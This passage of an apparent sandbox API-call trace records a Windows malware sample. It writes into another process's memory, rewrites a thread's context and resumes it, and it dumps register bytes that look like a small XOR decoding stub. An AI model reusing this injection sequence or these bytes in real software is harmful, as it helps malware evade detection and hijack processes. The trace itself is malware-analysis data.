ExtendedRegisters=([0]=0xd7, [1]=0xcf, [2]=0x0, [3]=0x0, [4]=0xdf, [5]=0x3f, [6]=0x10, [7]=0x7, [8]=0xd6, [9]=0xcf, [10]=0x0, [11]=0x9, [12]=0x55, [13]=0x8b, [14]=0xec, [15]=0x83, [16]=0xc4, [17]=0xf4, [18]=0x60, [19]=0x8b, [20]=0x4d, [21]=0x10, [22]=0x89, [23]=0x4d, [24]=0xfc, [25]=0x3, [26]=0x4d, [27]=0x14, [28]=0x89, [29]=0x4d, [30]=0xf4, [31]=0x8b, [32]=0x4d, [33]=0x10, [34]=0x8a, [35]=0x1, [36]=0x88, [37]=0x45, [38]=0xfb, [39]=0x8b, [40]=0x4d, [41]=0xc, [42]=0x8b, [43]=0x75, [44]=0x8, [45]=0x8b, [46]=0xfe, [47]=0x8a, [48]=0x6, [49]=0x46, [50]=0x32, [51]=0x45, [52]=0xfb, [53]=0x56, [54]=0x50, [55]=0xff, [56]=0x45, [57]=0xfc, [58]=0x8b, [59]=0x75, [60]=0xfc, [61]=0x8a, [62]=0x6, [63]=0x46, [64]=0x8b, [65]=0x5d, [66]=0xf4, [67]=0x39, [68]=0x5d, [69]=0xfc, [70]=0x75, [71]=0xb, [72]=0x8b, [73]=0x5d, [74]=0x10, [75]=0x89, [76]=0x5d, [77]=0xfc, [78]=0x8b, [79]=0xf3, [80]=0x8a, [81]=0x6, [82]=0x46, [83]=0x88, [84]=0x45, [85]=0xfb, [86]=0x58, [87]=0x5e, [88]=0x88, [89]=0x7, [90]=0x47, [91]=0x49, [92]=0x75, [93]=0xd1, [94]=0x61, [95]=0xc9, [96]=0xc2, [97]=0x10, [98]=0x0, [99]=0x0, [100]=0xdf, [101]=0x3f, [102]=0x10, [103]=0x7, [104]=0xc1, [105]=0xcf, [106]=0x0, [107]=0xc, [108]=0x4c, [109]=0x77, [110]=0x40, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x6c, [117]=0xf0, [118]=0x5d, [119]=0x0, [120]=0xcc, [121]=0xa8, [122]=0x37, [123]=0x2, [124]=0x54, [125]=0xa8, [126]=0x37, [127]=0x2, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x80, [137]=0xe6, [138]=0x96, [139]=0x72, [140]=0x6, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x6, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xf, [153]=0x10, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x10, [161]=0x2b, [162]=0x40, [163]=0x0, [164]=0xa4, [165]=0x2b, [166]=0x40, [167]=0x0, [168]=0xf0, [169]=0x2b, [170]=0x40, [171]=0x0, [172]=0x4c, [173]=0x2c, [174]=0x40, [175]=0x0, [176]=0xb8, [177]=0x2c, [178]=0x40, [179]=0x0, [180]=0x14, [181]=0x2d, [182]=0x40, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0xc4, [197]=0x3f, [198]=0x10, [199]=0x1c, [200]=0xc1, [201]=0xcf, [202]=0x0, [203]=0x8, [204]=0x20, [205]=0x2f, [206]=0x74, [207]=0x76, [208]=0x4, [209]=0x2f, [210]=0x74, [211]=0x76, [212]=0xd4, [213]=0x2e, [214]=0x74, [215]=0x76, [216]=0xb4, [217]=0x2e, [218]=0x74, [219]=0x76, [220]=0x98, [221]=0x2e, [222]=0x74, [223]=0x76, [224]=0x84, [225]=0x2e, [226]=0x74, [227]=0x76, [228]=0xc8, [229]=0xb, [230]=0x73, [231]=0x76, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0xc4, [237]=0xf0, [238]=0x5d, [239]=0x0, [240]=0x1, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0xe8, [253]=0xb, [254]=0x73, [255]=0x76, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0xc4, [261]=0xf0, [262]=0x5d, [263]=0x0, [264]=0x1, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x44, [273]=0x42, [274]=0x1, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x60, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0xec, [285]=0x9, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x90, [291]=0x1, [292]=0x0, [293]=0x0, [294]=0x4d, [295]=0x0, [296]=0x53, [297]=0x0, [298]=0x20, [299]=0x0, [300]=0x53, [301]=0x0, [302]=0x61, [303]=0x0, [304]=0x6e, [305]=0x0, [306]=0x73, [307]=0x0, [308]=0x20, [309]=0x0, [310]=0x53, [311]=0x0, [312]=0x65, [313]=0x0, [314]=0x72, [315]=0x0, [316]=0x69, [317]=0x0, [318]=0x66, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xc3, [365]=0x7, [366]=0xa, [367]=0x65, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x26, [381]=0x3f, [382]=0x10, [383]=0xfe, [384]=0xda, [385]=0xcf, [386]=0x0, [387]=0x8, [388]=0x80, [389]=0x38, [390]=0x1, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x60, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0xec, [401]=0x9, [402]=0x0, [403]=0x0, [404]=0x1, [405]=0x0, [406]=0x90, [407]=0x1, [408]=0x0, [409]=0x0, [410]=0x4d, [411]=0x0, [412]=0x53, [413]=0x0, [414]=0x20, [415]=0x0, [416]=0x53, [417]=0x0, [418]=0x61, [419]=0x0, [420]=0x6e, [421]=0x0, [422]=0x73, [423]=0x0, [424]=0x20, [425]=0x0, [426]=0x53, [427]=0x0, [428]=0x65, [429]=0x0, [430]=0x72, [431]=0x0, [432]=0x69, [433]=0x0, [434]=0x66, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x44, [477]=0x42, [478]=0x1, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x60, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0xec, [489]=0x9, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x90, [495]=0x1, [496]=0x0, [497]=0x0, [498]=0x4d, [499]=0x0, [500]=0x53, [501]=0x0, [502]=0x20, [503]=0x0, [504]=0x53, [505]=0x0, [506]=0x61, [507]=0x0, [508]=0x6e, [509]=0x0, [510]=0x73, [511]=0x0))) returned 0x0 [0199.419] GetLastError () returned 0x578 [0199.419] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.419] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0199.420] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.420] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.420] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.420] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.420] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.420] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.420] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.420] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.420] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.420] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.421] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0199.421] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.421] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.421] NtWriteVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde008, Buffer=0x4070c0*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x4070c0*, NumberOfBytesWritten=0x0) returned 0x0 [0199.421] GetLastError () returned 0x578 [0199.421] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.421] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f770, pvarResult=0x18f760 | out: pvarResult=0x18f760) returned 0x0 [0199.421] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f6a8 | out: ppsaOut=0x18f6a8) returned 0x0 [0199.422] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0199.422] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.422] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0199.422] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.422] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0199.422] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.422] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0199.422] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.422] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0199.422] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.422] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0199.422] SafeArrayDestroyDescriptor (psa=0x380f0b8) returned 0x0 [0199.422] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.423] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f6ac, Buffer=0x37d0120*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x37d0120*, NumberOfBytesWritten=0x0) returned 0x0 [0199.423] GetLastError () returned 0x578 [0199.423] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.423] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f75c | out: ppsaOut=0x18f75c) returned 0x0 [0199.424] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0199.424] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.424] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0199.424] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.424] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0199.424] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.424] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.424] NtSetContextThread (ThreadHandle=0x108, Context=0x5def18*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401364, Ebp=0x0, Eip=0x77e301c4, SegCs=0x23, EFlags=0x202, Esp=0x30fd18, SegSs=0x2b, ExtendedRegisters=([0]=0xd7, [1]=0xcf, [2]=0x0, [3]=0x0, [4]=0xdf, [5]=0x3f, [6]=0x10, [7]=0x7, [8]=0xd6, [9]=0xcf, [10]=0x0, [11]=0x9, [12]=0x55, [13]=0x8b, [14]=0xec, [15]=0x83, [16]=0xc4, [17]=0xf4, [18]=0x60, [19]=0x8b, [20]=0x4d, [21]=0x10, [22]=0x89, [23]=0x4d, [24]=0xfc, [25]=0x3, [26]=0x4d, [27]=0x14, [28]=0x89, [29]=0x4d, [30]=0xf4, [31]=0x8b, [32]=0x4d, [33]=0x10, [34]=0x8a, [35]=0x1, [36]=0x88, [37]=0x45, [38]=0xfb, [39]=0x8b, [40]=0x4d, [41]=0xc, [42]=0x8b, [43]=0x75, [44]=0x8, [45]=0x8b, [46]=0xfe, [47]=0x8a, [48]=0x6, [49]=0x46, [50]=0x32, [51]=0x45, [52]=0xfb, [53]=0x56, [54]=0x50, [55]=0xff, [56]=0x45, [57]=0xfc, [58]=0x8b, [59]=0x75, [60]=0xfc, [61]=0x8a, [62]=0x6, [63]=0x46, [64]=0x8b, [65]=0x5d, [66]=0xf4, [67]=0x39, [68]=0x5d, [69]=0xfc, [70]=0x75, [71]=0xb, [72]=0x8b, [73]=0x5d, [74]=0x10, [75]=0x89, [76]=0x5d, [77]=0xfc, [78]=0x8b, [79]=0xf3, [80]=0x8a, [81]=0x6, [82]=0x46, [83]=0x88, [84]=0x45, [85]=0xfb, [86]=0x58, [87]=0x5e, [88]=0x88, [89]=0x7, [90]=0x47, [91]=0x49, [92]=0x75, [93]=0xd1, [94]=0x61, [95]=0xc9, [96]=0xc2, [97]=0x10, [98]=0x0, [99]=0x0, [100]=0xdf, [101]=0x3f, [102]=0x10, [103]=0x7, [104]=0xc1, [105]=0xcf, [106]=0x0, [107]=0xc, [108]=0x4c, [109]=0x77, [110]=0x40, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x6c, [117]=0xf0, [118]=0x5d, [119]=0x0, [120]=0xcc, [121]=0xa8, [122]=0x37, [123]=0x2, [124]=0x54, [125]=0xa8, [126]=0x37, [127]=0x2, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x80, [137]=0xe6, [138]=0x96, [139]=0x72, [140]=0x6, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x6, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xf, [153]=0x10, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x10, [161]=0x2b, [162]=0x40, [163]=0x0, [164]=0xa4, [165]=0x2b, [166]=0x40, [167]=0x0, [168]=0xf0, [169]=0x2b, [170]=0x40, [171]=0x0, [172]=0x4c, [173]=0x2c, [174]=0x40, [175]=0x0, [176]=0xb8, [177]=0x2c, [178]=0x40, [179]=0x0, [180]=0x14, [181]=0x2d, [182]=0x40, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0xc4, [197]=0x3f, [198]=0x10, [199]=0x1c, [200]=0xc1, [201]=0xcf, [202]=0x0, [203]=0x8, [204]=0x20, [205]=0x2f, [206]=0x74, [207]=0x76, [208]=0x4, [209]=0x2f, [210]=0x74, [211]=0x76, [212]=0xd4, [213]=0x2e, [214]=0x74, [215]=0x76, [216]=0xb4, [217]=0x2e, [218]=0x74, [219]=0x76, [220]=0x98, [221]=0x2e, [222]=0x74, [223]=0x76, [224]=0x84, [225]=0x2e, [226]=0x74, [227]=0x76, [228]=0xc8, [229]=0xb, [230]=0x73, [231]=0x76, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0xc4, [237]=0xf0, [238]=0x5d, [239]=0x0, [240]=0x1, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0xe8, [253]=0xb, [254]=0x73, [255]=0x76, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0xc4, [261]=0xf0, [262]=0x5d, [263]=0x0, [264]=0x1, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x44, [273]=0x42, [274]=0x1, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x60, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0xec, [285]=0x9, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x90, [291]=0x1, [292]=0x0, [293]=0x0, [294]=0x4d, [295]=0x0, [296]=0x53, [297]=0x0, [298]=0x20, [299]=0x0, [300]=0x53, [301]=0x0, [302]=0x61, [303]=0x0, [304]=0x6e, [305]=0x0, [306]=0x73, [307]=0x0, [308]=0x20, [309]=0x0, [310]=0x53, [311]=0x0, [312]=0x65, [313]=0x0, [314]=0x72, [315]=0x0, [316]=0x69, [317]=0x0, [318]=0x66, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xc3, [365]=0x7, [366]=0xa, [367]=0x65, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x26, [381]=0x3f, [382]=0x10, [383]=0xfe, [384]=0xda, [385]=0xcf, [386]=0x0, [387]=0x8, [388]=0x80, [389]=0x38, [390]=0x1, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x60, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0xec, [401]=0x9, [402]=0x0, [403]=0x0, [404]=0x1, [405]=0x0, [406]=0x90, [407]=0x1, [408]=0x0, [409]=0x0, [410]=0x4d, [411]=0x0, [412]=0x53, [413]=0x0, [414]=0x20, [415]=0x0, [416]=0x53, [417]=0x0, [418]=0x61, [419]=0x0, [420]=0x6e, [421]=0x0, [422]=0x73, [423]=0x0, [424]=0x20, [425]=0x0, [426]=0x53, [427]=0x0, [428]=0x65, [429]=0x0, [430]=0x72, [431]=0x0, [432]=0x69, [433]=0x0, [434]=0x66, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x44, [477]=0x42, [478]=0x1, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x60, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0xec, [489]=0x9, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x90, [495]=0x1, [496]=0x0, [497]=0x0, [498]=0x4d, [499]=0x0, [500]=0x53, [501]=0x0, [502]=0x20, [503]=0x0, [504]=0x53, [505]=0x0, [506]=0x61, [507]=0x0, [508]=0x6e, [509]=0x0, [510]=0x73, [511]=0x0))) returned 0x0 [0199.424] GetLastError () returned 0x578 [0199.424] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.425] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f75c | out: ppsaOut=0x18f75c) returned 0x0 [0199.425] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0199.425] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.425] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0199.426] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.426] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0199.426] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.426] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0199.426] NtResumeThread (in: ThreadHandle=0x108, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0199.494] GetLastError () returned 0x578 [0199.494] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.494] GetCurrentProcessId () returned 0xa38 [0199.589] CoFreeUnusedLibraries () [0199.589] GetTickCount () returned 0x378c7 [0199.589] GetTickCount () returned 0x378c7 [0199.589] IsWindowVisible (hWnd=0x7028c) returned 0 [0199.589] Sleep (dwMilliseconds=0x0) [0199.666] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0199.667] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0199.667] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.667] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162195 [0199.667] GetTickCount () returned 0x37915 [0199.667] GetLastError () returned 0x578 [0199.667] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.667] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0199.667] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0199.667] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.667] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162195 [0199.667] GetTickCount () returned 0x37915 [0199.667] GetLastError () returned 0x578 [0199.667] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.668] GetCurrentProcessId () returned 0xa38 [0199.668] CoFreeUnusedLibraries () [0199.668] GetTickCount () returned 0x37915 [0199.668] GetTickCount () returned 0x37915 [0199.668] IsWindowVisible (hWnd=0x7028c) returned 0 [0199.668] Sleep (dwMilliseconds=0x0) [0199.806] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0199.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0199.807] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.807] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162221 [0199.807] GetTickCount () returned 0x379a1 [0199.807] GetLastError () returned 0x578 [0199.807] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.807] GetCurrentProcessId () returned 0xa38 [0199.807] CoFreeUnusedLibraries () [0199.807] GetTickCount () returned 0x379a1 [0199.807] GetTickCount () returned 0x379a1 [0199.807] IsWindowVisible (hWnd=0x7028c) returned 0 [0199.807] Sleep (dwMilliseconds=0x0) [0199.868] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0199.869] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0199.869] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.869] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162260 [0199.869] GetTickCount () returned 0x379e0 [0199.869] GetLastError () returned 0x578 [0199.869] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.869] GetCurrentProcessId () returned 0xa38 [0199.869] CoFreeUnusedLibraries () [0199.869] GetTickCount () returned 0x379e0 [0199.869] GetTickCount () returned 0x379e0 [0199.869] IsWindowVisible (hWnd=0x7028c) returned 0 [0199.869] Sleep (dwMilliseconds=0x0) [0199.931] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0199.931] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0199.932] 